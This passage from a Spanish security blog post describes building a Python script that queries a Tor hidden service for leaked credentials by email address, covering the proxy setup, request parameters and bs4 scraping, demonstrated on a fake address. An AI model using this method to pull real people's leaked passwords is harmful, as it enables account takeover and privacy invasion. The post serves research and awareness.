Un simple requests.get, o requests.post no nos va a servir, necesitamos ir a la red TOR. Para ello podemos configurar el proxy en una sesión y hacer las peticiones. Para montar el script necesitaremos saber qué datos envía la petición. Podemos usar Burp o revisar la petición en el navegador para conseguir esta información.

Figura 5: Petición POST al Hidden Service de TOR analizada en el navegador

La petición es POST y envía 5 parámetros, donde rápidamente se aprecia que el usuario del e-mail y dominio se envían por separado. Ya estamos preparados para obtener la página desde Python, pero a nosotros nos interesa filtrar el contenido, no queremos el HTML completo.

Para ello un simple proceso de "web-scraping" nos ayudará. Si inspeccionamos el contenido de la web con los resultados, vemos que los resultados se muestran dentro de unas etiquetas ‘pre’, así que con el uso de la librería bs4 podemos sacar los datos deseados. La salida del script se puede ver en la imagen siguiente.

Figura 6: Respuesta del servidor en la red TOR con las credenciales

El script ‘make.sh’ son tres líneas simplemente para instalar e iniciar TOR, instalar Python 3 y Pip3 - normalmente ya está instalado como sucede en el ejemplo de la imagen de arriba -, junto a una dependencia en Python, que es Pysocks.

Figura 7: Readme del script pwndb en Github

El puerto por defecto está en el 9050, pero podemos cambiarlo si se desea a otro modificando el archivo /etc/tor/torrc y agregando al final la línea SocksPort , en el script podemos indicarle el proxy. Vamos a ver un vídeo de su uso en un sistemas Microsoft Windows con el ejemplo de l correo falso ‘fakemail@gmail.com’.

Figura 8: PoC de búsqueda de contraseñas en la Deep Web

Visto un ejemplo, visto todos, con este tipo de funcionalidad puedes empezar a generar tus propios scripts para ir sacando la información que deseas y no solo contraseñas. Si quieres consultar el código del script, puedes visitar el siguiente repositorio de mi GitHub.

¡Hasta pronto!

Autor: Josué Encinar García (@JosueEncinar), autor del blog BoomerNiX y Security Researcher en ElevenPaths y en el equipo de Ideas Locas de la unidad CDO de Telefónica.